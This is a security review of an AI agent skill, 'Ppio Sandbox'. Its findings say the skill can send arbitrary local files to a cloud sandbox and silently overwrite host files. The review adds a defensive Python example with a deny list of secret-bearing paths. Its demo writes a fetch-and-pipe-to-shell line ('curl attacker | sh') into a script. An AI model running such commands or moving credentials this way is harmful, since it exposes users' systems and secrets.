Ppio Sandbox

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its cloud-sandbox purpose, but it is rated Review because it can copy arbitrary local files to and from a third-party sandbox and overwrite local files, even though its metadata states that it is not for local file access.

Install only if you are comfortable giving this skill a PPIO/E2B API key and letting it run commands in a billable cloud VM. Treat upload and download as sensitive operations: do not transfer secrets, credentials, SSH keys, private code, personal config, or workspace files unless you explicitly intend to send them to the cloud sandbox, and avoid downloading over existing local files. Kill sandboxes after use, especially after login-based browsing, because paused sandboxes can preserve files and browser state.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (4)

Description-Behavior Mismatch
Severity: High | Confidence: 98%

Finding: The skill metadata explicitly says it is not for reading or writing local user files, yet the upload and download commands directly access arbitrary host filesystem paths. In an agent setting, this creates a clear capability mismatch that can be abused to exfiltrate sensitive local files into the sandbox or overwrite files on the host, violating the stated trust boundary.

Context-Inappropriate Capability
Severity: High | Confidence: 98%

Finding: Arbitrary local file read/write is unjustified for a tool whose intended purpose is remote sandbox execution and browser isolation. Because the CLI accepts user-supplied local paths without restriction, an LLM agent could be induced to read secrets such as SSH keys or tokens, or write attacker-controlled data to sensitive host locations.

Intent-Code Divergence
Severity: Medium | Confidence: 83%

Finding: The module documentation presents the tool as providing secure remote execution, but the implementation also performs direct host-local file operations. This misleading framing can cause operators or downstream agents to overtrust the tool and use it in contexts where host isolation is assumed, increasing the chance of unsafe data exposure or file modification.

Missing User Warnings
Severity: Medium | Confidence: 93%

Finding: The download command writes directly to an arbitrary local path using normal file open semantics, which will overwrite existing files without warning. In an automated agent workflow, this can destroy host data or replace trusted local files with untrusted sandbox content, enabling persistence or corruption.
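The unrestricted-path and silent-overwrite problems raised in the findings above, as an added example that is not the Ppio Sandbox skill's own code: the local-path handling of a hypothetical upload/download CLI, with the plain `open(path, "wb")` write the last finding describes beside a guarded version that confines paths to a workspace root (resolving symlinks and `..`), refuses known secret-bearing locations, and creates files with O_EXCL so an existing host file is never replaced unless the caller opts in. The function names, the `DENY_PREFIXES` list and the workspace-root convention are assumptions made for the illustration; the fake key and script written into the temporary workspace are constructed test data.

```python
"""Added example for this review: guarding local paths in a sandbox file-transfer CLI.

Not the skill's implementation. Assumes a hypothetical CLI whose upload and
download commands take a user-supplied local path, as the findings describe.
"""
import os
import tempfile

# Constructed list of secret-bearing names an agent should never be able to
# ship to a cloud sandbox. Tune for the environment; this is an assumption.
DENY_PREFIXES = (".ssh", ".aws", ".gnupg", ".config", ".env")


class TransferRefused(Exception):
    """Raised when a transfer would leave the workspace or touch a denied path."""


def download_unsafe(local_path: str, data: bytes) -> str:
    # The behaviour flagged under "Missing User Warnings": normal open()
    # semantics, so an existing file is truncated and replaced silently.
    with open(local_path, "wb") as f:
        f.write(data)
    return local_path


def resolve_inside(root: str, local_path: str) -> str:
    """Return the real path of local_path, or raise if it escapes root or is denied."""
    root_real = os.path.realpath(root)
    # realpath() resolves symlinks and ".." even for not-yet-existing files,
    # so a link inside the workspace cannot point the write elsewhere.
    candidate = os.path.realpath(os.path.join(root_real, local_path))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TransferRefused(f"path escapes workspace root: {local_path}")
    top_level = os.path.relpath(candidate, root_real).split(os.sep, 1)[0]
    if top_level in DENY_PREFIXES or os.path.basename(candidate) in DENY_PREFIXES:
        raise TransferRefused(f"refusing to transfer secret-bearing path: {local_path}")
    return candidate


def upload_guarded(root: str, local_path: str) -> bytes:
    """Read a workspace file for upload, subject to the confinement checks."""
    with open(resolve_inside(root, local_path), "rb") as f:
        return f.read()


def download_guarded(root: str, local_path: str, data: bytes, overwrite: bool = False) -> str:
    """Write sandbox output into the workspace; refuse to clobber an existing file."""
    path = resolve_inside(root, local_path)
    # O_EXCL makes creation fail if anything already exists at the path,
    # which is the warning the original command lacks. 0o600 keeps the
    # untrusted content private to the user.
    flags = os.O_WRONLY | os.O_CREAT | (os.O_TRUNC if overwrite else os.O_EXCL)
    try:
        fd = os.open(path, flags, 0o600)
    except FileExistsError:
        raise TransferRefused(f"refusing to overwrite existing file: {local_path}") from None
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def _refused(action) -> bool:
    try:
        action()
    except TransferRefused:
        return True
    return False


def demo() -> dict:
    """Run both variants in a throwaway workspace and report what each allowed."""
    results = {}
    with tempfile.TemporaryDirectory() as ws:
        # Constructed workspace: one trusted script and one fake SSH key.
        trusted = os.path.join(ws, "run.sh")
        with open(trusted, "w") as f:
            f.write("echo trusted\n")
        os.makedirs(os.path.join(ws, ".ssh"))
        with open(os.path.join(ws, ".ssh", "id_ed25519"), "w") as f:
            f.write("constructed fake key, not a real secret\n")

        # Unsafe variant: the trusted script is replaced with no warning at all.
        download_unsafe(trusted, b"curl attacker | sh\n")
        results["unsafe_overwrote"] = open(trusted).read() == "curl attacker | sh\n"

        # Guarded variant: overwrite, traversal and key upload are refused;
        # a fresh file inside the workspace is still allowed.
        results["refused_overwrite"] = _refused(lambda: download_guarded(ws, "run.sh", b"x"))
        results["refused_escape"] = _refused(lambda: download_guarded(ws, "../../etc/passwd", b"x"))
        results["refused_key_upload"] = _refused(lambda: upload_guarded(ws, ".ssh/id_ed25519"))
        download_guarded(ws, "result.txt", b"ok")
        with open(os.path.join(ws, "result.txt"), "rb") as f:
            results["wrote_new_file"] = f.read() == b"ok"
    return results


if __name__ == "__main__":
    print(demo())
```

The guarded version does not make copying host files to a billable third-party VM safe in itself; it only narrows what an induced agent can reach and makes the destructive case (replacing a trusted local file with sandbox content) an explicit, logged refusal instead of a silent write.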

VirusTotal

66/66 vendors flagged this skill as clean.